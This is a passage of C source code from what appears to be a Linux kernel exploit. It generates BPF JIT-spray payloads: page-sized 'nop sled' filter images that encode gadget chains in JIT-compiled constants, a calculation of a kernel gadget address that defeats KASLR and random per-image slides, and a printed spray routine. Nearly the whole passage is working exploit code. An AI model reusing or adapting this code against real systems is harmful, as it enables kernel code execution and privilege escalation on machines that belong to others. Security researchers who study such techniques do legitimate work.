	for (j = 0; j < (0xee - 0x80 - insn_lengths[SHL]) / insn_lengths[NEG]; j++)
		OP(BPF_ALU | BPF_NEG, 0);

	// part II: the callee 8 pages ahead

	// How long does the nop sled need to be for the next payload?
	// We have max 56 bytes random slide from kernel.
	// Assuming image which executed the call has slide length 0 and the image hit
	// has slide length 56 we will hit the hole above (of size > 56), so nothing
	// required.
	// In the other extreme, call would hit 56 bytes after the hole so we need
	// another nop sled like in the beginning
	for (j = 0; j < 28; j++)
		OP(BPF_ALU | BPF_NEG, 0);

	// Now the actual payload which is hit by the call. This payload will move
	// 0x1000 into r8d and add a small offset to the return address which
	// emulates the hole similar to the call, only that it widens the hole up
	// the final "page nop sled" payload.

	//
	// NOTE: Caution when editing the chain below. It was designed with some fiddling
	// around making the encoding possible within 1 page (see also notes below)
	//

	j = 0;

	// first get a known value into r8d. we only have _or_ and _add_ so here we are ..
	// eax = -1
	offsets[j++] = mov_eax_0xe90000XX(0x01);
	offsets[j++] = sub_eax_0xe90000XX(0x02);

	// [rsp] = -1
	offsets[j++] = push_rax();

	// rax = rsp
	offsets[j++] = push_rsp();
	offsets[j++] = pop_rax();

	// r8d = -1
	offsets[j++] = or_r8d_RAX();

	// clean up [rax]
	offsets[j++] = pop_rax();

	// eax = 8
	offsets[j++] = mov_eax_0xe90000XX(0x09);
	offsets[j++] = sub_eax_0xe90000XX(0x01);

	// [rsp] = 8
	offsets[j++] = push_rax();

	// rax = rsp
	offsets[j++] = push_rsp();
	offsets[j++] = pop_rax();

	offsets[j++] = add_r8d_RAX(); // r8d = 00000007 [rax] = 00000008
	offsets[j++] = add_RAX_r8d(); // r8d = 00000007 [rax] = 0000000f
	offsets[j++] = add_r8d_RAX(); // r8d = 00000016 [rax] = 0000000f
	offsets[j++] = add_RAX_r8d(); // r8d = 00000016 [rax] = 00000025
	offsets[j++] = add_r8d_RAX(); // r8d = 0000003b [rax] = 00000025
	offsets[j++] = add_RAX_r8d(); // r8d = 0000003b [rax] = 00000060
	offsets[j++] = add_RAX_r8d(); // r8d = 0000003b [rax] = 0000009b
	offsets[j++] = add_r8d_RAX(); // r8d = 000000d6 [rax] = 0000009b
	offsets[j++] = add_r8d_RAX(); // r8d = 00000171 [rax] = 0000009b
	offsets[j++] = add_RAX_r8d(); // r8d = 00000171 [rax] = 0000020c

	// now we add the small offset to the return address before continuing
	// preserve [rax], next address is the return address
	offsets[j++] = pop_rdx();

	// duplicate return address, now [rax] = return address,
	offsets[j++] = pop_rbp();
	offsets[j++] = push_rbp();
	offsets[j++] = push_rbp();

	// add the small offset (5 * 0x171)
	// (we choose this because of alignment requirements and it being a reasonable
	//  value for the part III offset)
	offsets[j++] = add_RAX_r8d();
	offsets[j++] = add_RAX_r8d();
	offsets[j++] = add_RAX_r8d();
	offsets[j++] = add_RAX_r8d();
	offsets[j++] = add_RAX_r8d();

	// restore original [rax] value
	offsets[j++] = pop_rbp();
	offsets[j++] = push_rdx();

	offsets[j++] = add_r8d_RAX(); // r8d = 0000037d [rax] = 0000020c
	offsets[j++] = add_RAX_r8d(); // r8d = 0000037d [rax] = 00000589
	offsets[j++] = add_RAX_r8d(); // r8d = 0000037d [rax] = 00000906
	offsets[j++] = add_RAX_r8d(); // r8d = 0000037d [rax] = 00000c83
	offsets[j++] = add_r8d_RAX(); // r8d = 00001000 [rax] = 00000c83

	// now r8d is 0x1000 and ready to be used by the nop sled
	// increment return address by another full page and start sliding
	offsets[j++] = pop_rdx(); // tmp
	offsets[j++] = push_rbp(); // new return address
	offsets[j++] = add_RAX_r8d();

	// duplicate return address to mimic a call
	offsets[j++] = pop_rbp();
	offsets[j++] = pop_rdx(); // original return address, do not need anymore
	offsets[j++] = push_rbp();
	offsets[j++] = push_rbp();

	offsets[j++] = ret();

	// part III: The "nop sled". At this point rax = rsp + 8, r8d = 0x1000
	unsigned j2 = 0;
	// duplicate the return address
	offsets2[j2++] = pop_rbp();
	offsets2[j2++] = push_rbp();
	offsets2[j2++] = push_rbp();

	// jump 1 page forward
	offsets2[j2++] = add_RAX_r8d();

	// duplicate return address to mimic a call
	offsets2[j2++] = pop_rbp();
	offsets2[j2++] = pop_rdx(); // original return address, do not need anymore
	offsets2[j2++] = push_rbp();
	offsets2[j2++] = push_rbp();

	offsets2[j2++] = ret();

	// So in order to make the whole payload fit into 1 page we do an interleaved
	// encoding of the two jump chains.
	// The two chains were designed together so that the first one has a rather
	// long hole at the end which we target for the encoding.
	// This is hole encoding is best effort and is likely not going to work for
	// arbitrary interleaving payloads.
	struct hole_opts hole = HOLE_INIT(500 /*generous padding nop slide*/, offsets2, j2);
	insn_i = __encode_offsets(filter, insn_i, filter_len, offsets, j, RET, &hole);

	// Now pad to the full page to ensure alignment between images
	insn_i = __fill_to_size(filter, filter_len, insn_i, 0x1000);

	fprintf(stderr, "[nop sled] num insn = %d\n", insn_i);
	*filter_len = insn_i;
}

static void prepare_bpf_jit_nop_sled_final(struct sock_filter* filter, unsigned* filter_len) {

	// The final image needs to jump out of the slide and undo the added offset back to
	// the original one in order to allow maximum space for the real payload
	// We added 5*0x171 to the call return address for the slide.
	// So simply increase this images size to cancel this out (+- some alignment,
	// but we can increase the nop sled in the payload image a bit to make up for
	// that)

	// we need to match the slide of the previous image (56) + call instruction (5+2encoding) +
	// offset added to the call return address (5*0x171).

	unsigned insn_i = 0;
	// First ret, get it out of the way... See X86_FEATURE_RETHUNK
	OP(BPF_RET | BPF_A, 0);

	struct map_entry tmp[5 * 0x171 + 7 - insn_lengths[FIRST_RET]] = {};
	ASSERT(find_minimal_encoding(tmp, LEN(tmp), false));
	insn_i = __encode_translate_map(tmp, LEN(tmp), filter, filter_len, insn_i);

	// slide to both sides
	for (int i = 0; i < 56*2 + 5 /*just to be sure*/; i++)
		OP(BPF_ALU | BPF_NEG, 0);

	// now the same return logic of the previous slide images again
	unsigned j = 0;
	u32 offsets[0x100] = {};

	// duplicate the return address
	offsets[j++] = pop_rbp();
	offsets[j++] = push_rbp();
	offsets[j++] = push_rbp();

	// jump 1 page forward
	offsets[j++] = add_RAX_r8d();

	// duplicate return address to mimic a call
	offsets[j++] = pop_rbp();
	offsets[j++] = pop_rdx(); // original return address, do not need anymore
	offsets[j++] = push_rbp();
	offsets[j++] = push_rbp();

	offsets[j++] = ret();

	insn_i = __encode_offsets(filter, insn_i, filter_len, offsets, j, MOD, NULL);

	// blow up size to roughly match desired offsets:
	insn_i = __fill_to_size(filter, filter_len, insn_i, 0x1000 + 0x171 * 5 + 7);

	fprintf(stderr, "[nop sled final image] num insn = %d\n", insn_i);
	*filter_len = insn_i;
}

static void dump_bpf_jit_padding_to_full_pack(unsigned space_taken, unsigned long* offset) {
	unsigned len = 512;
	unsigned* filter_len = &len;
	unsigned insn_i = 0;
	struct sock_filter filter[512] = {};
	// First ret. See X86_FEATURE_RETHUNK
	OP(BPF_RET | BPF_A, 0);

	unsigned filled_pages = (space_taken / 0x1000);
	*offset = (unsigned long)(filled_pages / 512 + 1/*we fill at least one pack*/) * 0x1000 * 512;
	filled_pages %= 512 /* sizeof pack in pages*/;

	// Since we always use jit payloads of at least page size we only need to fill
	// the page sized holes
	insn_i = __fill_to_size(filter, filter_len, insn_i, 0x1000);

	printf("struct sock_filter filter_padding[] = {\n");
	for (unsigned i = 0; i < insn_i; i++) {
		PRINT_FILTER(filter[i]);
	}
	printf("};\n");
	printf("const unsigned n_filter_padding = %u;\n", 512 - filled_pages);
}

int main(int argc, char* argv[]) {
	#define PROG_LEN 0x1000
	struct sock_filter filter[PROG_LEN] = {};
	unsigned len = PROG_LEN;

	parse_opts(argc, argv);

	prepare_bpf_jit_nop_sled(filter, &len);
	printf("struct sock_filter filter_nop_sled[] = {\n");
	for (unsigned i = 0; i < len; i++) {
		PRINT_FILTER(filter[i]);
	}
	printf("};\n\n");

	len = PROG_LEN;
	prepare_bpf_jit_nop_sled_final(filter, &len);
	printf("struct sock_filter filter_nop_sled_final[] = {\n");
	for (unsigned i = 0; i < len; i++) {
		PRINT_FILTER(filter[i]);
	}
	printf("};\n\n");

	len = PROG_LEN;
	prepare_bpf_jit_payload(filter, &len);
	printf("struct sock_filter filter_payload[] = {\n");
	for (unsigned i = 0; i < len; i++) {
		PRINT_FILTER(filter[i]);
	}
	printf("};\n\n");

	unsigned long offset;
	dump_bpf_jit_padding_to_full_pack(bpf_jit_pack_space_taken, &offset);

	// see comments in prepare_bpf_jit_nop_sled()
	unsigned long gadget = 0xffffffffc0000000
		+ ((module_alloc_space_taken + 0xFFF) & 0xFFF)
		+ offset
	#ifndef NOKASLR_DEBUG
		+ 0x1000 /* 1 page is guaranteed to be added as random offset */
	#endif
		+ (512 + 1 /*guard page*/ + 497) * 0x1000 /* end of valid range with minimal offset */
		+ 84 /* bypass random per-image slide */
		+ 8 /* pack header */
		+ 1 /* break alignment */;
	printf("unsigned long gadget = 0x%016lxull;\n\n", gadget);

	printf("int gadget_do_spray(void) {\n"
		"	int count = 0;\n"
		"	#define __do_spray(x) do {\\\n"
		"		count++; \\\n"
		"		if (spray_one_filter(x, sizeof(x) / sizeof(x[0])) < 0) \\\n"
		"			return -1;\\\n"
		"		} while (0)\n"
		"	for (unsigned i = 0; i < n_filter_padding; i++)\n"
		"		__do_spray(filter_padding);\n"
		"	for (int n = 0; n < 2; n++) {\n"
		"		for (int i = 0; i < 512 - 2 - 4; i++)\n"
		"			__do_spray(filter_nop_sled);\n"
		"		__do_spray(filter_nop_sled_final);\n"
		"		__do_spray(filter_payload);\n"
		"	}\n"
		"	return count;\n"
		"}\n");

	return 0;
}
